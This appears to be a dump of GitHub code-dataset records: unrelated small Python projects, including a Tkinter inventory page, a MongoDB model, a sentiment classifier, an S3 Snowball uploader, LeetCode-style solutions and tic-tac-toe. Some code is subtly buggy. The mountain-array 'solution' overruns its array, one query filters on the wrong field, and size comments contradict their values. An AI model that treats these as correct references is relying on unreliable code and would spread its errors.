cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.logout)\n        Menu9.grid(row=0, column=14, padx=5, pady=10)\n        DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n        DivLine.grid(row=0,column=15, pady=10)\n\n\n        Date = datetime.now()\n        Menu10 = Label(MenuFrame, text=f\"{Date:%A, %B, %d, %Y}\", font=('roboto', 9, 'bold'), bg='green', fg='white')\n        Menu10.grid(row=0, column=17, padx=5, pady=10)\n        Menu11 = Label(MenuFrame, text=strftime('%I:%M:%S'), font=('roboto', 9, 'bold'), bg='green', fg='white')\n        Menu11.grid(row=0, column=18, pady=10)\n\n        def tick():\n            # refresh the clock label and re-schedule this callback every second\n            Menu11.config(text=strftime('%I:%M:%S'))\n            Menu11.after(1000, tick)\n        Menu11.after(1000, tick)\n\n        # Second Frames & Menu\n        SideFrame = LabelFrame(window, height=300, width=150)\n        SideFrame.pack(fill=Y, expand='no', anchor=W, padx=10, pady=40)\n\n\n        SideMenu = Button(SideFrame, text='Add Product', font=('roboto', 9, 'bold'), bg='#d11c03', fg='white', bd=0, cursor='hand2', activebackground='#d11c03', activeforeground='white', command=self.addp)\n        SideMenu.grid(row=0, column=0, padx=10, pady=7)\n\n\n\n        # Center Frames & Labels\n        Sales = LabelFrame(window, text=\"Our Products\", height=275, width=648, font=('roboto', 9, 'bold'), fg='green')\n        Sales.pack(fill=X, expand='no')\n        Sales.place(x=130, y=75)\n\n        Style = ttk.Style()\n        Style.theme_use('clam')\n        Style.configure('Treeview',\n                        font=('roboto', 10, 'bold'),\n                        background='#f7f3f2',\n                        rowheight=20,\n                        activebackground=\"#81C44C\")\n\n        Style.map('Treeview', background=[('selected', 'green')])\n        # #bd2505\n\n        Tscroll = Scrollbar(Sales, orient='vertical')\n        Tscroll.pack(side=RIGHT, fill=Y)\n\n        SalesView = ttk.Treeview(Sales, yscrollcommand=Tscroll.set, selectmode='extended')\n        SalesView.pack(pady=10, padx=10)\n        Tscroll.configure(command=SalesView.yview)\n        SalesView['columns'] = ('PID', 'PRODUCT NAME', 'UNIT', 'DATE')\n\n        SalesView.column('#0', width=0, stretch=NO)\n        SalesView.column('PID', anchor=CENTER, width=70)\n        SalesView.column('PRODUCT NAME', anchor=CENTER, width=140)\n        SalesView.column('UNIT', anchor=CENTER, width=120)\n        SalesView.column('DATE', anchor=CENTER, width=75)\n        \n\n        SalesView.heading('#0', text='', anchor=CENTER)\n        SalesView.heading('PID', text='PID', anchor=CENTER)\n        SalesView.heading('PRODUCT NAME', text='PRODUCT NAME', anchor=CENTER)\n        SalesView.heading('UNIT', text='UNIT', anchor=CENTER)\n        SalesView.heading('DATE', text='DATE', anchor=CENTER)\n\n        LiveUp = Label(window, text='Products Live Updates', font=('roboto', 10, 'bold'), bg='#d11c03', fg='white')\n        LiveUp.place(x=617, y=82)\n\n        LiveUpF = LabelFrame(window, text='', width=190, height=226)\n        LiveUpF.pack(fill=Y, expand='no', side=RIGHT)\n        LiveUpF.place(x=600, y=115)\n\n        PEX = Label(LiveUpF, text='Product: Quantity Produced', font=('roboto', 10, 'bold')).place(x=1, y=2)\n\n        PP1 = Label(LiveUpF, text='Product 1:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=30)\n        PP2 = Label(LiveUpF, text='Product 2:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=50)\n        PP3 = Label(LiveUpF, text='Product 3:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=70)\n        PP4 = Label(LiveUpF, text='Product 4:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=90)\n        PP5 = Label(LiveUpF, text='Product 5:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=110)\n        PP6 = Label(LiveUpF, text='Product 6:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=130)\n        PPR1 = Label(LiveUpF, text='120000', font=('roboto', 10, 'bold')).place(x=80, y=30)\n        PPR2 = Label(LiveUpF, text='130000', font=('roboto', 10, 'bold')).place(x=80, y=50)\n        
PPR3 = Label(LiveUpF, text='140000', font=('roboto', 10, 'bold')).place(x=80, y=70)\n        PPR4 = Label(LiveUpF, text='150000', font=('roboto', 10, 'bold')).place(x=80, y=90)\n        PPR5 = Label(LiveUpF, text='160000', font=('roboto', 10, 'bold')).place(x=80, y=110)\n        PPR6 = Label(LiveUpF, text='170000', font=('roboto', 10, 'bold')).place(x=80, y=130)\n        \n\n        # SrcDate = DateEntry(window, selectmode='day')\n        # SrcDate.place(x=140, y=370)\n\n        # SrcBtn = Button(window, text='Search', font=('roboto', 10, 'bold'), bg='green', fg='white', cursor='hand2', command=src)\n        # SrcBtn.place(x=260, y=365)\n\n\n        SalesData()\n\n\n    def dashb(self):\n        win = Toplevel()\n        dashboard.Dashboard(win)\n        self.window.withdraw()\n        win.deiconify()\n\n    def prod(self):\n        win = Toplevel()\n        products.Products(win)\n        self.window.withdraw()\n        win.deiconify()\n\n    def saless(self):\n        win = Toplevel()\n        sales.Sales(win)\n        self.window.withdraw()\n        win.deiconify()\n\n    def cus(self):\n        win = Toplevel()\n        customers.Customers(win)\n        self.window.withdraw()\n        win.deiconify()\n\n    def addp(self):\n        win = Toplevel()\n        addproduct.AddProduct(win)\n        self.window.withdraw()\n        win.deiconify()\n\n    def addc(self):\n        win = Toplevel()\n        addcustomer.AddCustomer(win)\n        self.window.withdraw()\n        win.deiconify()\n\n    def adds(self):\n        win = Toplevel()\n        addsales.AddSales(win)\n        self.window.withdraw()\n        win.deiconify()\n    \n    def logout(self):\n        win = Toplevel()\n        signin.Signin(win)\n        self.window.withdraw()\n        win.deiconify()\n\ndef run_products():\n    # named run_products so it does not shadow the products module imported above\n    window = Tk()\n    Products(window)\n    window.mainloop()\n\nif __name__ == '__main__':\n    run_products()","repo_name":"GbolahanAlaba/GLBL","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
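# A minimal, self-contained sketch of the self-rescheduling clock used in the
# products page above: `after` needs a callback that re-registers itself, or
# the label is rendered once and never refreshes.
from tkinter import Tk, Label
from time import strftime

root = Tk()
clock = Label(root, font=('roboto', 9, 'bold'), bg='green', fg='white')
clock.pack()

def tick():
    clock.config(text=strftime('%I:%M:%S'))  # repaint the current time
    clock.after(1000, tick)                  # run again in one second

tick()
root.mainloop()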
+{"seq_id":"33447955943","text":"from bson.objectid import ObjectId\nfrom .modal import Modal\n\n\nclass LoveModal(Modal):\n def __init__(self) -> None:\n super().__init__(collectionName=\"loves\", validator={\n '$jsonSchema': {\n 'bsonType': 'object',\n 'title': \"Loves Object Validation\",\n 'required': ['user_id', 'post_id'],\n 'properties': {\n 'user_id': {\n 'bsonType': 'string',\n 'description': \"'user_id' must be a string and is required\"\n },\n 'post_id': {\n 'bsonType': 'string',\n 'description': \"'post_id' must be a string and is required\"\n },\n }\n }\n })\n\n def readAll(self, userId: str):\n \"\"\"\n Return all the loves that a paticular user did\n :userId str: The id of the user\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': userId})\n return data\n\n def readAllLoves(self, postId: str):\n \"\"\"\n Return all the loves on a paticular post\n :postId: The id of the post\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': postId})\n return data\n\n def isUserLovedPost(self, userId: str, postId: str) -> bool:\n loveData = self.read({'user_id': userId, 'post_id': postId})\n if loveData is not None:\n return True\n return False\n","repo_name":"Uday-lal/insta_clone","sub_path":"server/model/loveModal.py","file_name":"loveModal.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"6685952785","text":"from sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import Pipeline\r\nimport pickle\r\nimport mysql.connector\r\nimport json\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"\",\r\n database=\"project\"\r\n)\r\n\r\n## TOKENIZING\r\ncount_vect = CountVectorizer()\r\nfilobjek=open(\"sklearn_try/train_data\",'rb')\r\ntrain_data=pickle.load(filobjek)\r\nX_train_counts = count_vect.fit_transform(train_data)\r\n# print(train_data)\r\n\r\n## TF TRANSFORMER\r\nfilobjek=open(\"sklearn_try/train_count\",'rb')\r\ntrain_count=pickle.load(filobjek)\r\ntf_transformer = TfidfTransformer().fit(train_count)\r\n# print(train_count)\r\n\r\ntest_data=list()\r\nmycursor = mydb.cursor()\r\nmycursor.execute(\"SELECT * FROM data_crawling_baru\")\r\nmyresult = mycursor.fetchall()\r\nfor id_crawl,konten,id_tes in myresult:\r\n test_data.append(konten)\r\n\r\nfilobjek=open(\"sklearn_try/model_train\",'rb')\r\nclff=pickle.load(filobjek)\r\nX_new_counts = count_vect.transform(test_data)\r\nX_new_tf = tf_transformer.transform(X_new_counts)\r\npredicted = clff.predict(X_new_tf)\r\n\r\nsentimen=list()\r\nfor doc, category in zip(test_data, predicted):\r\n # print('%r => %s' % (doc, category))\r\n sentimen.append(category)\r\n\r\npos=0\r\nneg=0\r\nfor status in sentimen:\r\n if status==\"positif\":\r\n pos=pos+1\r\n elif status==\"negatif\":\r\n neg=neg+1\r\n\r\n\r\nhasil_sentimen={\"positif\":pos,\"negatif\":neg}\r\njson_sentimen=json.dumps(hasil_sentimen)\r\nprint(json_sentimen)","repo_name":"ahmadhafidh/analysis-of-sentiment-ranking-and-rating-apps","sub_path":"sklearn_try/try_new_datasentimen.py","file_name":"try_new_datasentimen.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"36802178816","text":"#-*- encoding: utf8 -*-\n'''\nstatus: failed\nversion: v11\nway: using multi-part uploading\nref: https://gist.github.com/teasherm/bb73f21ed2f3b46bc1c2ca48ec2c1cf5\nchangelog:\n - 2020.02.19\n - adding fifo operation to reducing for big file which is over max_part_size \n - removing tarfiles_one_time logic\n - spliting buffer by max_part_size\n - 2020.02.18:\n - supprt snowball limit:\n - max_part_size: 512mb\n - min_part_size: 5mb\n - 2020.02.14: \n - modifying for python3 \n - support korean in Windows\n - 2020.02.12: adding features \n - gen_filelist by size\n - 2020.02.10: changing filename from tar_to_s3_v7_multipart.py to snowball_uploader_8.py\n - adding features which can split tar file by size and count.\n - adding feature which create file list\n - showing help message\n'''\n\nimport boto3\nimport tarfile\nimport io\nimport os.path\nfrom datetime import datetime\nimport sys\nimport shutil\n\nbucket_name = \"your-own-dest-seoul\"\ns3 = boto3.client('s3', endpoint_url='https://s3.ap-northeast-2.amazonaws.com')\n#s3 = boto3.client('s3', region_name='ap-northeast-2', endpoint_url='https://s3.ap-northeast-2.amazonaws.com', aws_access_key_id=None, aws_secret_access_key=None)\n#tarfiles_one_time = 1000\nmax_size = 100 * 1000 ** 2 # 70GB\nmax_part_size = 20 * 1024 ** 2 # 100MB\nmin_part_size = 5 * 1024 ** 2 # 5MB\ntarget_path = '.' ## very important!! change to your source directory\nif os.name == 'nt':\n filelist_dir = \"C:/tmp/fl_logdir_dkfjpoiwqjefkdjf/\" #for windows\nelse:\n filelist_dir = '/tmp/fl_logdir_dkfjpoiwqjefkdjf/' #for linux\n\n#source_file = ''\n\n## Caution: you have to modify rename_file function to fit your own naming rule\n#def rename_file(org_file):\n# return org_file.replace('\\n','') + \"_new_buffer\"\n#org_files_list = open(source_file).readlines()\n#target_files_list = list(map(rename_file, org_files_list))\n## to use same name (org file name == target file name), uncomment below line\n#target_files_list = org_files_list\n\n#### don't need to modify from here\ncurrent_time = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n#key_name = ('snowball-batch-%s-%s.tar' % (source_file, current_time))\n#key_name = ('snowball-batch-%s.tar' % ( current_time))\n\nparts = []\n#s3_location = \"s3://\" + bucket_name + \"/\" + batch_tar\n\ndef gen_filelist():\n sum_size = 0\n fl_prefix = 'fl_'\n fl_index = 1\n shutil.rmtree(filelist_dir,ignore_errors=True)\n try:\n os.mkdir(filelist_dir)\n except: pass\n print('generating file list by size %s bytes' % max_size)\n for r,d,f in os.walk(target_path):\n for file in f:\n file_name = os.path.join(r,file)\n fl_name = filelist_dir + '/' + fl_prefix + str(fl_index) + \".txt\"\n sum_size = sum_size + os.path.getsize(file_name)\n if max_size < sum_size:\n fl_index = fl_index + 1 \n sum_size = 0\n print('%s' % file_name)\n with open(fl_name, 'a', encoding='utf8') as fl_content:\n fl_content.write(file_name + '\\n') \n print('file lists are generated!!')\n print('check %s' % filelist_dir)\n return os.listdir(filelist_dir)\n\n#def add_metadata_to_s3(bucket_name, key_name):\n# s3.copy_object(Key=key_name, Bucket=bucket_name,\n# CopySource={\"Bucket\": bucket_name, \"Key\": key_name},\n# Metadata={\"snowball-auto-extract\": \"true\"},\n# MetadataDirective=\"REPLACE\")\ndef log_error(org_file, str_suffix):\n with open(error_file,'a+', encoding='utf8') as err:\n err.write(org_file + str_suffix)\ndef log_success(target_file, str_suffix):\n with open(successlog_file,'a+', encoding='utf8') as success:\n 
success.write(target_file + str_suffix)\n\n#def flush_mem(out):\n# out.seek(0)\n# out.truncate()\n\ndef create_mpu():\n mpu = s3.create_multipart_upload(Bucket=bucket_name, Key=key_name, Metadata={\"snowball-auto-extract\": \"true\"})\n mpu_id = mpu[\"UploadId\"]\n return mpu_id\n\ndef upload_mpu(mpu_id, data, index):\n #part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index, ContentLength=max_buf_size)\n part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index)\n parts.append({\"PartNumber\": index, \"ETag\": part[\"ETag\"]})\n #print ('parts list: %s' % str(parts))\n return parts\n\ndef complete_mpu(mpu_id, parts):\n result = s3.complete_multipart_upload(\n Bucket=bucket_name,\n Key=key_name,\n UploadId=mpu_id,\n MultipartUpload={\"Parts\": parts})\n return result\n\ndef copy_to_snowball(org_files_list, target_files_list):\n recv_buf = io.BytesIO()\n mpu_id = create_mpu()\n parts_index = 1\n with tarfile.open(fileobj=recv_buf, mode=\"w\") as tar:\n for index in range(len(org_files_list)):\n org_file = org_files_list[index].replace('\\n','')\n target_file = target_files_list[index].replace('\\n','')\n print ('\\n########################')\n print ('0. program is starting')\n if os.path.isfile(org_file):\n tar.add(org_file, arcname=target_file)\n print ('1. %s is archiving\\n' % target_file )\n print ('1. recv_buf size: %s' % len(recv_buf.getvalue()))\n log_success(target_file, \" is archived successfully\\n\")\n ###################\n print ('%s is uploading\\n' % key_name )\n print (\"2. recv_buf pos: %s\" % recv_buf.tell())\n recv_buf_size = recv_buf.tell()\n cur_pos = 0\n if recv_buf_size > max_part_size:\n print('max file is checked')\n print('3.big recv_buf size: %s' % recv_buf_size)\n print('3.big recv_buf pos : %s' % recv_buf.tell())\n while recv_buf_size > max_part_size:\n print('4.sending big : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n print('4.sent big : %s' % recv_buf.tell())\n tmp_buf = io.BytesIO() # added for FIFO operation\n tmp_buf.write(recv_buf.read()) # added for FIFO operation\n print('4.moved recv to tmp')\n recv_buf = tmp_buf\n #cur_pos = cur_pos + max_part_size + 1\n print('4.1.big recv_buf pos: %s' % recv_buf.tell())\n print('4.2.big recv_buf size: %s' % len(recv_buf.getvalue()))\n recv_buf_size = recv_buf.tell()\n if recv_buf_size >= min_part_size:\n recv_buf.seek(0,0)\n print('5.sending big-small peek : %s' % recv_buf.peek())\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n recv_buf.truncate(0)\n print('5.big-small recv_buf size: %s' % len(recv_buf.getvalue()))\n print('5.big-small recv_buf pos : %s' % recv_buf.tell())\n else:\n print('6 remaining buf of big is %s' % recv_buf_size )\n #spared_buf_size = recv_buf_size\n #pass\n else:\n #if spared_buf_size:\n # cur_pos = spared_buf_size * -1\n if recv_buf_size < min_part_size:\n print('7. normal recev buffer should be passed')\n print('7.1 recv_buf size: %s' % len(recv_buf.getvalue()))\n print('7.2 recv_buf pos : %s' % recv_buf.tell())\n #recv_buf.seek(0,0)\n #mpu_parts = upload_mpu(mpu_id, recv_buf.read(), parts_index)\n #parts_index += 1\n #recv_buf.seek(0)\n #recv_buf.truncate(0)\n ###################\n else:\n log_error(org_file,\" does not exist\\n\")\n print (org_file + ' is not exist...............................................\\n')\n print (\"8. 
final recv_buf size: \" + str(len(recv_buf.getvalue())))\n print('8.1 final recv_buf pos : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(), parts_index)\n parts_index += 1\n print (\"8. %s is uploaded\" % key_name)\n complete_mpu(mpu_id, mpu_parts)\n ### print metadata\n meta_out = s3.head_object(Bucket=bucket_name, Key=key_name)\n print ('\\n\\n metadata info: %s' % str(meta_out)) \n log_success(str(meta_out), '!!\\n')\n print (\"\\n\\n tar file: %s\" % key_name)\n log_success(key_name, ' is uploaded successfully\\n')\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print (\"Usage: %s genlist | cp_snowball | help\" % sys.argv[0]) \n sys.exit()\n elif sys.argv[1] == \"genlist\":\n gen_filelist()\n elif sys.argv[1] == \"cp_snowball\":\n source_files = os.listdir(filelist_dir)\n for sf in source_files:\n error_file = ('error_%s_%s.log' % (sf, current_time))\n successlog_file = ('success_%s_%s.log' % (sf, current_time))\n source_file = os.path.join(filelist_dir, sf)\n org_files_list = open(source_file, encoding='utf8').readlines()\n target_files_list = org_files_list\n #line_break = int(len(org_files_list) / tarfiles_one_time + 1)\n #final_line_list = [ i*int(tarfiles_one_time)-1 for i in range(1,line_break)]\n #final_line_list.append(len(org_files_list)-1)\n key_name = ('snowball-%s-%s.tar' % (sf[:-4], current_time))\n copy_to_snowball(org_files_list, target_files_list)\n parts = []\n else:\n print (\"Usage: %s 'genlist | cp_snowball | help'\" % sys.argv[0])\n","repo_name":"hatsari/article","sub_path":"aws/s3_snowball/working/snowball_uploader_13_almost_success.py","file_name":"snowball_uploader_13_almost_success.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"38"}
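# Distilled sketch (added for clarity, not part of the original script) of the
# invariant the buffering logic above maintains: no part may exceed
# max_part_size, and every part except the last must be at least min_part_size
# (the S3/Snowball multipart minimum).
def split_into_parts(total, max_part=20 * 1024 ** 2, min_part=5 * 1024 ** 2):
    parts = []
    remaining = total
    while remaining > max_part:
        parts.append(max_part)
        remaining -= max_part
    if parts and 0 < remaining < min_part:
        # borrow from the previous part so the tail stays >= min_part
        parts[-1] -= min_part - remaining
        remaining = min_part
    parts.append(remaining)
    return parts

assert split_into_parts(22 * 1024 ** 2) == [17 * 1024 ** 2, 5 * 1024 ** 2]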
+{"seq_id":"28140688163","text":"import sympy\n\nfrom numpy import array as array\nfrom numpy import mat as mat\nfrom numpy import zeros as zeros\nfrom numpy.linalg import det as det\n\nfrom math import sqrt as sqrt\n\nnum_term = 3\n\na = sympy.symarray(\"a\",num_term)\nb = sympy.symarray(\"b\",num_term)\n\nr,s = sympy.symbols(\"r, s\")\nmonomials = array([1,r,s])\n\nert = a.dot(monomials)\nest = b.dot(monomials)\neqt = sqrt(0.5)*(est-ert)\n\nnum_equation = 6\neq_array = sympy.symarray(\"temp\", num_equation)\n\neq_array[0] = ert.subs([(r,0), (s,0)])\neq_array[1] = ert.subs([(r,1), (s,0)])\neq_array[2] = est.subs([(r,0), (s,0)])\neq_array[3] = est.subs([(r,0), (s,1)])\neq_array[4] = eqt.subs([(r,1), (s,0)])\neq_array[5] = eqt.subs([(r,0), (s,1)])\n\n\nnum_variable = a.size + b.size\n\nx = sympy.symarray(\"temp\", num_variable)\nfor i in range(0, a.size):\n x[i] = a[i]\nfor i in range(0, b.size):\n x[i + a.size] = b[i]\n\nA = mat(zeros((num_equation,num_variable)))\nfor i in range (0,num_equation) : \n eq = eq_array[i] \n for j in range (0, num_variable) :\n target_variable = x[j]\n A[i, j] = eq.coeff(target_variable)\n\nprint(det(A))\n\n# mrt, mst, mqt = sympy.symbols(\"mrt, mst, mqt\")\n# b = array([mrt, mrt, mst, mst, mqt, mqt])\n# b = mat(b).T\n\n# x = A.I * b\n# print(x)\n\n\n\n\n\n# er1,es2,er3,es3 = sympy.symbols(\"er1 es2 er3 es3\")\n\n# c = sqrt(0.5)\n\n# A = mat(\n# [[1, 0, 0, 0, 0, 0],\n# [1, 1, 0, 0, 0, 0],\n# [0, 0, 0, 1, 0, 0],\n# [0, 0, 0, 1, 0, 1], \n# [-c, -c, 0, c, c, 0],\n# [-c, 0, -c, c, 0, c]\n# ])\n\n# A_inv = inv(A)\n\n# b = mat([[er1],[er1],[es2],[es2],[c*(es3-er3)],[c*(es3-er3)]])\n\n# print(A_inv * b)","repo_name":"rla523at/Study","sub_path":"code/Python/2004_(Lee_&_Bathe)/MITC3.py","file_name":"MITC3.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"74844206830","text":"from plotutils import *\nfrom vidutils import load_video_frames, get_face_probs\nfrom audioutils import get_audio_probs\nfrom tensorflow import keras\nimport joblib\nimport numpy as np\nimport argparse\nimport os\nimport warnings\n\n\ndef get_current_aud_prob(ts, aud_probs):\n for key in aud_probs:\n if ts >= key:\n return aud_probs[key]\n\n\ndef get_vid_probs(aud_probs, face_probs, timestamps, theta=.5):\n vid_probs = []\n for ts, face_prob in zip(timestamps, face_probs):\n aud_prob = get_current_aud_prob(ts, aud_probs)\n if face_prob is not None:\n vid_probs.append(theta * face_prob + (1-theta) * aud_prob)\n else:\n vid_probs.append(aud_prob)\n return vid_probs\n\n\ndef main(vidpath, resultspath, resultname):\n vmodel = keras.models.load_model('assets/keras_vgg19_84acc.h5')\n amodel = joblib.load('assets/audio_mlp_classifier.joblib')\n frames, faces, timestamps = load_video_frames(vidpath, skip=10)\n face_probs = get_face_probs(vmodel, faces)\n aud_probs = get_audio_probs(amodel, vidpath)\n print('aud_probs', aud_probs)\n print('face_probs', face_probs)\n probs = get_vid_probs(aud_probs, face_probs, timestamps) # [.2, .3, ...]\n leveled_probs = smooth_probs(probs, 3, 1)\n title = get_basename(vidpath)\n savepath = os.path.join(resultspath, resultname or title)\n tsplot(timestamps, probs, savepath + '.jpg')\n show_frames(probs, frames, savepath + '_frames.png')\n tsjson(timestamps, leveled_probs, savepath + '.json')\n\n\n# get vidpath, resultspath from command line if provided, else default\ndef parseargs():\n parser = argparse.ArgumentParser(\n description='Demo for shouting action recognition in videos.')\n parser.add_argument('--vidpath', help='The path to an .mp4 file.')\n parser.add_argument(\n '--resultspath', help='The path to a folder to store the results of analysis.')\n parser.add_argument(\n '--resultname', help='The base name of the result files to be generated. If none, use vidname.')\n args = parser.parse_args()\n vidpath = args.vidpath or './videos/demo.mov'\n resultspath = args.resultspath or './results'\n resultname = args.resultname or None\n return vidpath, resultspath, resultname\n \n\n\nif __name__ == '__main__':\n vidpath, resultspath, resultname = parseargs()\n assert os.path.exists(vidpath), 'Video path does not exist'\n assert os.path.exists(resultspath), 'Results path does not exist'\n main(vidpath, resultspath, resultname)\n","repo_name":"josiahcoad/ActionRecognition","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"39658506898","text":"#!/usr/bin/env python\n\ndef longestCommonSubsequence(text1: str, text2: str) -> int:\n m = len(text1) \n n = len(text2)\n dp = [[0 for i in range(n + 1)] for j in range(m + 1)]\n\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if text1[i - 1] == text2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + 1\n else:\n dp[i][j] = max(dp[i - 1][j], dp[i][j - 1])\n \n return dp[-1][-1]\n\nif __name__ == '__main__':\n x = \"abcde\"\n y = \"ace\"\n print(\"The longest common subsequence length of the input strings is: \")\n print(longestCommonSubsequence(x, y))","repo_name":"ymtowya/CS5800-code","sub_path":"assign9/as9_1.py","file_name":"as9_1.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"11499610944","text":"from types import SimpleNamespace\n\n\ndef get_default_configs():\n cfg = SimpleNamespace(**{})\n cfg.model_dir = 'models/'\n\n cfg.device = 'cuda:0'\n cfg.batch_size = 32\n cfg.num_workers = 4\n cfg.base_lr = 5e-5\n cfg.warmup_factor = 10\n cfg.num_epochs = 50\n cfg.folds_to_run = [0]\n cfg.patience = 10\n cfg.seed = 67\n cfg.amp = True\n\n cfg.ver_note = 'v1'\n cfg.sample = None\n\n cfg.backbone = 'tf_efficientnet_b3_ns'\n cfg.backbone_pretrained = True\n\n return cfg\n","repo_name":"gallegi/AnyCV","sub_path":"commons/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"38102664538","text":"\"\"\" Valid Mountain Array\nGiven an array of integers arr, return true if and only if it is a valid mountain array.\n\nRecall that arr is a mountain array if and only if:\n\narr.length >= 3\nThere exists some i with 0 < i < arr.length - 1 such that:\narr[0] < arr[1] < ... < arr[i - 1] < arr[i]\narr[i] > arr[i + 1] > ... > arr[arr.length - 1]\n\n##### Solution\nWe can use two pointers for this problem one starting from left and one from right. We loop over the entire array\nand increase the left index when arr[left+1]>index[left] and decrease the right index by one when arr[right-1]>index[right].\nAt the end when left is equal to right and both are not zero, it is a valid mountain array. We do not want\neither left or right to be zero at the end because it means that the values did not increase.\n\"\"\"\n\n\nclass Solution:\n def validMountainArray(self, arr) -> bool:\n # start a left pointer and a right pointer\n left, right = 0, len(arr) - 1\n # loop over each element in the array\n for i in range(len(arr)):\n # if the array is increasing from left, increase the left by one\n if arr[left + 1] > arr[left]:\n left += 1\n # if the array is increasing from right, decrease the right by one\n if arr[right - 1] > arr[right]:\n right -= 1\n # if left and right are the same and are not zero, it is a valid mountain\n return left == right and not (left == 0 or right == 0)","repo_name":"RustamyF/data-structure-Python","sub_path":"src/algostructure/arrays/code/valid_mountain.py","file_name":"valid_mountain.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37324235096","text":"from random import randrange\n\n\ndef DisplayBoard(board):\n#\n# the function accepts one parameter containing the board's current status\n# and prints it out to the console\n# \n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[0][0],board[0][1],board[0][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[1][0],board[1][1],board[1][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[2][0],board[2][1],board[2][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n\n\ndef EnterMove(board):\n#\n# the function accepts the board current status, asks the user about their move, \n# checks the input and updates the board according to the user's decision\n#\n free_squares = MakeListOfFreeFields(board)\n user = int(input('Select the Box to mark : '))\n if 0 < user <10:\n if free_squares[user-1] == 'R':\n print('Box alreay Occopied. Select another')\n else:\n i,j = free_squares[user-1]\n board[i][j] = 'O'\n return board \n\n\ndef MakeListOfFreeFields(board):\n#\n# the function browses the board and builds a list of all the free squares; \n# the list consists of tuples, while each tuple is a pair of row and column numbers\n#\n free_squares = list()\n for i in range(3):\n for j in range(3):\n if board[i][j] == 'X' or board[i][j] == 'O':\n free_squares.append('R')\n else:\n free_squares.append((i,j))\n #print(free_squares)\n return free_squares\n\n\ndef VictoryFor(board, sign):\n#\n# the function analyzes the board status in order to check if \n# the player using 'O's or 'X's has won the game\n# \n check = True\n count = 0\n\n combinations = [\n [(0,0),(0,1),(0,2)],\n [(1,0),(1,1),(1,2)],\n [(2,0),(2,1),(2,2)],\n [(0,0),(1,0),(2,0)],\n [(0,1),(1,1),(2,1)],\n [(0,2),(1,2),(2,2)],\n [(0,0),(1,1),(2,2)],\n [(0,2),(1,1),(2,0)]\n ]\n\n for row in combinations:\n for pair in row:\n i,j = pair\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n count = 0\n\n if check == False and sign == 'X':\n print('Computer Won!')\n elif check == False and sign == 'O':\n print('You Won!')\n return check\n \n \"\"\"\n #check Rows\n for i in range(3):\n for j in range(3):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n #check Columns\n for i in range(3):\n for j in range(3):\n if board[j][i] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check left middles\n for i in range(3):\n for j in range(i,i+1):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check Right middles\n \n for i in range(2,-1,-1):\n for j in range():\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\"\"\"\n \ndef DrawMove(board):\n#\n# the function draws the computer's move and updates the board\n#\n if type(board[1][1]) == int:\n board[1][1] = 'X'\n else:\n free_squares = MakeListOfFreeFields(board)\n while True:\n comp = randrange(10)\n if free_squares[comp-1] == 'R':\n continue\n else:\n i,j = free_squares[comp-1]\n board[i][j] = 'X'\n return 